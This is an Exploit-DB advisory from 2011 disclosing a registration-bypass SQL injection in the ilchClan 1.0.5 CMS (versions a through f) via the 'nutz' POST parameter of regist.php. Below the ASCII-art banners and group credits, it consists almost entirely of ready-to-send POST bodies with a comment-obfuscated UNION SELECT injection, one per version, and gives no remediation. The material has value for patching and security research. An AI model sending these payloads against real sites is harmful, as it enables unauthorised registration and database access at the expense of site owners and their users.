ilchClan 1.0.5 - 'regist.php' SQL Injection

EDB-ID:

17101

CVE:

N/A


Platform:

PHP

Published:

2011-04-02

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
/                                  _____ _      _                                       \ 
\                                  \_   \ | ___| |__                                    /
/                                   / /\/ |/ __| '_ \                                   \
\                                /\/ /_ | | (__| | | |                                  /
/                                \____/ |_|\___|_| |_|                                  \
\               Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php            /
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-                
                                         by
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/                                                                                       \ 
\ ___ ___ ___ ___                         _ _           _____           _         _     /
/| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_   \
\|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|  /
/  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|    \
\                                              |___|                 |___|              /
/                                                                                       \
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f! 
        Vulnerability Name : Registration Bypass SQL Injection Vulnerability 
                                 Date : 02.04.2011
                             SQL Injection method : $_POST   
                              Discovered by : Easy Laster
Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com
                               Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                      Security Flaws
                                 =-=-=-=-=-=-=-=-=-=-=-=
                                     ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
                                     ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
                                     ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
                                     ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
                                     ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
                                     ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
                                     ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa